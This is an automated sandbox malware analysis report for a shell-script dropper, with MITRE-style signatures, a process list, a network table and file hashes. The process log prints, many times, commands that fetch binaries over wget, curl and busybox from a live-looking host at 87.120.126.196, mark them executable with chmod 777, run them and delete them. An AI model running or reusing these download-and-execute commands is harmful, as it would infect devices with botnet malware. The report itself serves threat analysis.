Malware Analysis Report

2025-05-28 20:52

Sample ID 241021-bp88lashnl
Target 632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh
SHA256 632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e
Tags
antivm defense_evasion discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e

Threat Level: Shows suspicious behavior

The file 632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:20

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:20

Reported

2024-10-21 01:22

Platform

debian9-armhf-20240611-en

Max time kernel

39s

Max time network

49s

Command Line

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A

Processes

/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/830-1-0xb677c000-0xb678d044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:20

Reported

2024-10-21 01:23

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

155s

Command Line

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 N/A
N/A /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa N/A
N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
